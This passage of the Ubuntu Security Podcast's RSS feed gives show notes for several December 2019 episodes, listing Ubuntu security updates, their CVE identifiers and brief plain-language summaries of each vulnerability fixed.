<li><a href="https://ubuntu.com/security/CVE-2019-19052">CVE-2019-19052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18660">CVE-2019-18660</a> <!-- raw HTML omitted -->
<ul>
<li>SpectreRSB mitigations not properly enforced on PPC</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14897">CVE-2019-14897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14896">CVE-2019-14896</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Libertas Wifi Driver - OTA - crash / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14901">CVE-2019-14901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14895">CVE-2019-14895</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Wifi-Ex Driver - OTA - crash / ACE</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="lsn-0061-1-linux-kernel-vulnerability-06-38">[LSN-0061-1] Linux kernel vulnerability [06:38]</h3>
<ul>
<li>5 CVEs addressed in Bionic &amp; Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15794">CVE-2019-15794</a> <!-- raw HTML omitted -->
<ul>
<li>OverlayFS &amp; ShiftFS reference counting issue - <a href="https://ubuntusecuritypodcast.org/episode-55/">Episode 55</a></li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14901">CVE-2019-14901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14895">CVE-2019-14895</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Wifi-Ex Driver - OTA - crash / ACE</li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2019-14897">CVE-2019-14897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14896">CVE-2019-14896</a> <!-- raw HTML omitted -->
<ul>
<li>2 heap overflows in Marvell Libertas Wifi Driver - OTA - crash / ACE</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-connected-devices-and-smart-assistants-07-25">Alex and Joe discuss connected devices and smart assistants [07:25]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E058.mp3" length="19662183" type="audio/mpeg" /><itunes:duration>20:28</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 57
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-57/</link>
          <pubDate>Thu, 19 Dec 2019 13:36:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>b113e6411042301448ceef505c8f2dd3c9a8081cc39c6a7758beb85d457fe90468ce0d6dd8f225cdb41fef3f48a53672c0b6cceaace7af7c18dea7cae8f09dd3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 57</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In the final episode of 2019, we look at security updates for RabbitMQ,
  GraphicsMagick, OpenJDK and more, plus Joe and Alex discuss a typical
  day-in-the-life of a Ubuntu Security Team member.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  In the final episode of 2019, we look at security updates for RabbitMQ,
  GraphicsMagick, OpenJDK and more, plus Joe and Alex discuss a typical
  day-in-the-life of a Ubuntu Security Team member.
  </itunes:summary>
        <description>  In the final episode of 2019, we look at security updates for RabbitMQ,
  GraphicsMagick, OpenJDK and more, plus Joe and Alex discuss a typical
  day-in-the-life of a Ubuntu Security Team member.
  </description>
        <googleplay:description>  In the final episode of 2019, we look at security updates for RabbitMQ,
  GraphicsMagick, OpenJDK and more, plus Joe and Alex discuss a typical
  day-in-the-life of a Ubuntu Security Team member.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In the final episode of 2019, we look at security updates for RabbitMQ,
GraphicsMagick, OpenJDK and more, plus Joe and Alex discuss a typical
day-in-the-life of a Ubuntu Security Team member.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>34 unique CVEs addressed</p>
<h3 id="usn-4217-2-samba-vulnerabilities-01-00">[<a href="https://usn.ubuntu.com/4217-2/">USN-4217-2</a>] Samba vulnerabilities [01:00]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14870">CVE-2019-14870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14861">CVE-2019-14861</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See <a href="https://ubuntusecuritypodcast.org/episode-56/">Episode 56</a></li>
</ul>
<h3 id="usn-4214-2-rabbitmq-vulnerability-01-23">[<a href="https://usn.ubuntu.com/4214-2/">USN-4214-2</a>] RabbitMQ vulnerability [01:23]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18609">CVE-2019-18609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>AMQP implementation</li>
<li>Possible integer overflow when handling the CONNECTION_STATE_HEADER
frame - rogue server could return a malicious frame header which is then
processed by the client and leads to a smaller target_size value due to
integer overflow - then when the frame data is copied in via memcpy()
this would overwrite past the bounds of the heap allocation, and with
attacker controlled data</li>
<li>Not an issue if connecting to trusted servers</li>
</ul>
<h3 id="usn-4222-1-graphicsmagick-vulnerabilities-02-28">[<a href="https://usn.ubuntu.com/4222-1/">USN-4222-1</a>] GraphicsMagick vulnerabilities [02:28]</h3>
<ul>
<li>15 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-13777">CVE-2017-13777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13776">CVE-2017-13776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13775">CVE-2017-13775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13737">CVE-2017-13737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13134">CVE-2017-13134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13065">CVE-2017-13065</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13064">CVE-2017-13064</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13063">CVE-2017-13063</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12937">CVE-2017-12937</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12936">CVE-2017-12936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12935">CVE-2017-12935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11643">CVE-2017-11643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11642">CVE-2017-11642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11641">CVE-2017-11641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11638">CVE-2017-11638</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-55/">Episode 55</a> covered previous update for GraphicsMagick - more of the same
here</li>
</ul>
<h3 id="usn-4223-1-openjdk-vulnerabilities-03-00">[<a href="https://usn.ubuntu.com/4223-1/">USN-4223-1</a>] OpenJDK vulnerabilities [03:00]</h3>
<ul>
<li>16 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2999">CVE-2019-2999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2992">CVE-2019-2992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2989">CVE-2019-2989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2988">CVE-2019-2988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2987">CVE-2019-2987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2983">CVE-2019-2983</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2978">CVE-2019-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2977">CVE-2019-2977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2975">CVE-2019-2975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2981">CVE-2019-2981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2973">CVE-2019-2973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2964">CVE-2019-2964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2962">CVE-2019-2962</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2949">CVE-2019-2949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2945">CVE-2019-2945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2894">CVE-2019-2894</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream micro-release for openjdk 8 and openjdk 11</li>
<li>Various mix of issues (buffer overflows, NULL pointer dereferences and
various denial of service issues on application crashes in different
scenarios) - see the full USN for details</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-a-day-in-the-life-of-a-ubuntu-security-team-member-03-50">Joe and Alex discuss a day-in-the-life of a Ubuntu Security Team member [03:50]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E057.mp3" length="18082298" type="audio/mpeg" /><itunes:duration>18:50</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 56
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-56/</link>
          <pubDate>Fri, 13 Dec 2019 20:49:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>f287302b1359224248445e7bc22ea58930f25defb4f809f390a9c6589bef6a2fd5f945c313fbf20124d5d495339fa35f77edf452e00177e07b1c3ee0555d9a40</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 56</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In the second to last episode for 2019, we look at security updates for
  Samba, Squid, Git, HAProxy and more, plus Alex and Joe discuss Evil Corp
  hacker indictments, unsecured AWS S3 buckets and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  In the second to last episode for 2019, we look at security updates for
  Samba, Squid, Git, HAProxy and more, plus Alex and Joe discuss Evil Corp
  hacker indictments, unsecured AWS S3 buckets and more.
  </itunes:summary>
        <description>  In the second to last episode for 2019, we look at security updates for
  Samba, Squid, Git, HAProxy and more, plus Alex and Joe discuss Evil Corp
  hacker indictments, unsecured AWS S3 buckets and more.
  </description>
        <googleplay:description>  In the second to last episode for 2019, we look at security updates for
  Samba, Squid, Git, HAProxy and more, plus Alex and Joe discuss Evil Corp
  hacker indictments, unsecured AWS S3 buckets and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In the second to last episode for 2019, we look at security updates for
Samba, Squid, Git, HAProxy and more, plus Alex and Joe discuss Evil Corp
hacker indictments, unsecured AWS S3 buckets and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>43 unique CVEs addressed</p>
<h3 id="usn-4212-1-haproxy-vulnerability-00-50">[<a href="https://usn.ubuntu.com/4212-1/">USN-4212-1</a>] HAProxy vulnerability [00:50]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19330">CVE-2019-19330</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to treat malformed headers as invalid - HTTP/2 allows encoding
headers as binary and these can then contain characters which would be
invalid when converted to HTTP/1.1 - as such these should be treated as
invalid, otherwise allows to send on invalid headers to HTTP/1.1 servers
and could be used to launch attacks against them - so test for and reject
in valid chars (CR, LF and NUL)</li>
</ul>
<h3 id="usn-4213-1-squid-vulnerabilities-01-37">[<a href="https://usn.ubuntu.com/4213-1/">USN-4213-1</a>] Squid vulnerabilities [01:37]</h3>
<ul>
<li>7 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18679">CVE-2019-18679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18678">CVE-2019-18678</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18677">CVE-2019-18677</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18676">CVE-2019-18676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12854">CVE-2019-12854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12526">CVE-2019-12526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12523">CVE-2019-12523</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in URN handling (uniform resource name, globally unique
identifier within a particular namespace - e.g. urn:ietf:rfc:2648):
<ul>
<li>When handling URN requests Squid makes a corresponding HTTP request but
the various access control checks that are normally done for HTTP
weren&rsquo;t done so could end up accessing restricted HTTP resources (such
as servers that listen to localhost etc)</li>
<li>Heap buffer overflow if response received from a server that is
handling a URN request does not fit within the buffer</li>
<li>Failure to NUL terminal strings - buffer overflow on read -&gt; crash in
cachemgr cgi process - DoS to all clients using the cachemgr</li>
</ul>
</li>
<li>Able to redirect traffic to origins that should be disallowed due to use
of append_domain setting</li>
<li>HTTP request smuggling (<a href="https://ubuntusecuritypodcast.org/episode-52/">Episode 52</a> for HAProxy)</li>
<li>Nonces used for HTTP digest authentication were generated from a raw byte
value of a pointer from a heap memory allocation - this allows attackers
to deduce this pointer value and therefore help to defeat ASLR</li>
</ul>
<h3 id="usn-4214-1-rabbitmq-vulnerability-03-54">[<a href="https://usn.ubuntu.com/4214-1/">USN-4214-1</a>] RabbitMQ vulnerability [03:54]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18609">CVE-2019-18609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow if a client sent a frame of size close to UINT32_MAX - a
resulting size is calculated that could overflow, and then memory
allocated with this overflowed (and hence small) size, resulting in a
heap buffer overflow when the frame is copied to that resulting buffer -
so instead just reject frames greater than INT32_MAX</li>
</ul>
<h3 id="usn-4215-1-nss-vulnerability-04-38">[<a href="https://usn.ubuntu.com/4215-1/">USN-4215-1</a>] NSS vulnerability [04:38]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17007">CVE-2019-17007</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL pointer dereference -&gt; crash -&gt; DoS when handling Netscape
Certificate Sequences (a type of encoded certificate) handled by NSS</li>
</ul>
<h3 id="usn-4216-1-firefox-vulnerabilities-05-07">[<a href="https://usn.ubuntu.com/4216-1/">USN-4216-1</a>] Firefox vulnerabilities [05:07]</h3>
<ul>
<li>9 CVEs addressed in Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17014">CVE-2019-17014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17013">CVE-2019-17013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17012">CVE-2019-17012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17011">CVE-2019-17011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17010">CVE-2019-17010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17008">CVE-2019-17008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17005">CVE-2019-17005</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11756">CVE-2019-11756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11745">CVE-2019-11745</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream firefox release (71.0)
<ul>
<li>Includes fix for NSS issue discussed last week plus other sorts of issues:
<ul>
<li>UAFs</li>
<li>Stack memory corruption</li>
<li>Heap buffer overflows etc</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4217-1-samba-vulnerabilities-05-45">[<a href="https://usn.ubuntu.com/4217-1/">USN-4217-1</a>] Samba vulnerabilities [05:45]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14870">CVE-2019-14870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14861">CVE-2019-14861</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Kerberos delegation allows to be configured as non-forwardable - but this
would not be honored properly by the Samba AD DC - so could allow
delegation to be forwarded by clients even when was disabled by config</li>
<li>Able to read invalid memory and so crash AD DC if a DNS record was
created that matched the name of a DNS zone due to type confusion</li>
</ul>
<h3 id="usn-4218-1-gnu-c-vulnerability-06-43">[<a href="https://usn.ubuntu.com/4218-1/">USN-4218-1</a>] GNU C vulnerability [06:43]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6485">CVE-2018-6485</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>eglibc was used as the standard libc in Ubuntu in older releases like
Trusty/Precise etc - posix_memalign integer overflow - allocates memory
of a given size aligned to a certain size - could return a smaller area
than requested -&gt; heap overflow as a result</li>
</ul>
<h3 id="usn-4219-1-libssh-vulnerability-07-30">[<a href="https://usn.ubuntu.com/4219-1/">USN-4219-1</a>] libssh vulnerability [07:30]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14889">CVE-2019-14889</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libssh ssh_scp_new() function takes a 3rd argument - if this could be
attacker influenced then could possible inject arbitrary commands which
will then be run on the server - so requires the API to be used in a
particular way - but could then allow users to execute commands on the
server even if they should only have been able to copy files</li>
</ul>
<h3 id="usn-4220-1-git-vulnerabilities-08-16">[<a href="https://usn.ubuntu.com/4220-1/">USN-4220-1</a>] Git vulnerabilities [08:16]</h3>
<ul>
<li>9 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19604">CVE-2019-19604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1387">CVE-2019-1387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1354">CVE-2019-1354</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1353">CVE-2019-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1352">CVE-2019-1352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1351">CVE-2019-1351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1350">CVE-2019-1350</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1349">CVE-2019-1349</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1348">CVE-2019-1348</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE if clone a malicious repo with a crafted .gitmodules file (used to
specify git submodules for the parent repo)</li>
<li>Mishandling of CLI arguments during cloning of repos via SSH URLs allowed
possible RCE</li>
<li>Arbitrary path overwrite during a fast-import due to incorrect handling
of the export-marks option</li>
<li>WSL relevant issues:
<ul>
<li>On Windows would write out filenames that contained backslashes even
though these then act as directory separators on Windows</li>
<li>Wouldn&rsquo;t enforce NTFS protections in the working directory</li>
<li>Didn&rsquo;t take into account NTFS Alternate Data Streams, allowing files
inside the .git dir to be overwritten during clone (file attribute
specific to NTFS, allowing to store data for a file alongside the
actual file itself)</li>
<li>Second attack via NTFS ADS via name squatting on the git~2 short-name</li>
<li>Didn&rsquo;t handle Window virtual drives which can be named as not just say
A: but a full name - git would handle these as relative paths, allowing
writing outside the worktree during a clone</li>
</ul>
</li>
</ul>
<h3 id="usn-4202-2-thunderbird-regression-10-15">[<a href="https://usn.ubuntu.com/4202-2/">USN-4202-2</a>] Thunderbird regression [10:15]</h3>
<ul>
<li>10 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15903">CVE-2019-15903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11764">CVE-2019-11764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11763">CVE-2019-11763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11762">CVE-2019-11762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11761">CVE-2019-11761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11760">CVE-2019-11760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11759">CVE-2019-11759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11758">CVE-2019-11758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11757">CVE-2019-11757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11755">CVE-2019-11755</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Upstream regression - previous update 68.2.1 could result in a new
profile being created for some users so would appear to lose settings etc</li>
</ul>
<h3 id="usn-4221-1-libpcap-vulnerability-10-37">[<a href="https://usn.ubuntu.com/4221-1/">USN-4221-1</a>] libpcap vulnerability [10:37]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15165">CVE-2019-15165</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible buffer overflow when handling PHB headers - confusion upstream
about which commit fixes which part but have included all the various
commits from upstream - thanks Steve for taking the time to dig into this
issue</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-evil-corp-hackers-and-unsecured-s3-buckets-11-06">Alex and Joe discuss Evil Corp hackers and unsecured S3 buckets [11:06]</h3>
<ul>
<li><a href="https://threatpost.com/birth-certificate-data-multiple-states/150948/">https://threatpost.com/birth-certificate-data-multiple-states/150948/</a></li>
<li><a href="https://threatpost.com/feds-5m-reward-evil-corp-dridex-hacker/150858/">https://threatpost.com/feds-5m-reward-evil-corp-dridex-hacker/150858/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E056.mp3" length="25564185" type="audio/mpeg" /><itunes:duration>26:37</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 55
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-55/</link>
          <pubDate>Mon, 09 Dec 2019 13:05:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>c0e25d7ca543be2f8864b68c4880a8bce21bdc7fafe372f1a4f9b438b97114da4a395d106471dd4ac1ad2550aa4d13a8d9bade442b08f1ffb531220b45501952</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 55</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover security updates for NSS, SQLite, the Linux kernel and
  more, plus Joe and Alex discuss a recent FBI advisory warning about
  possible dangers of Smart TVs.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover security updates for NSS, SQLite, the Linux kernel and
  more, plus Joe and Alex discuss a recent FBI advisory warning about
  possible dangers of Smart TVs.
  </itunes:summary>
        <description>  This week we cover security updates for NSS, SQLite, the Linux kernel and
  more, plus Joe and Alex discuss a recent FBI advisory warning about
  possible dangers of Smart TVs.
  </description>
        <googleplay:description>  This week we cover security updates for NSS, SQLite, the Linux kernel and
  more, plus Joe and Alex discuss a recent FBI advisory warning about
  possible dangers of Smart TVs.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates for NSS, SQLite, the Linux kernel and
more, plus Joe and Alex discuss a recent FBI advisory warning about
possible dangers of Smart TVs.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>49 unique CVEs addressed</p>
<h3 id="usn-4203-1-usn-4203-2-nss-vulnerability-00-59">[<a href="https://usn.ubuntu.com/4203-1/">USN-4203-1</a>, <a href="https://usn.ubuntu.com/4203-2/">USN-4203-2</a>] NSS vulnerability [00:59]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11745">CVE-2019-11745</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write if using an output buffer smaller than the block size (since
used block size instead of buffer size) when writing output for
NSC_EncryptUpdate()</li>
</ul>
<h3 id="usn-4204-1-psutil-vulnerability-02-05">[<a href="https://usn.ubuntu.com/4204-1/">USN-4204-1</a>] psutil vulnerability [02:05]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18874">CVE-2019-18874</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Double free due to mishandling of reference counting when handling errors
during conversion of system data into Python objects - could be triggered
when using a malicious disk partition label with an invalid character
that fails to decode - so triggers error than fails to cleanup properly
and results in a double free</li>
</ul>
<h3 id="usn-4205-1-sqlite-vulnerabilities-02-59">[<a href="https://usn.ubuntu.com/4205-1/">USN-4205-1</a>] SQLite vulnerabilities [02:59]</h3>
<ul>
<li>6 CVEs addressed in Precise ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5827">CVE-2019-5827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5018">CVE-2019-5018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19244">CVE-2019-19244</a> <!-- raw HTML omitted --></li>
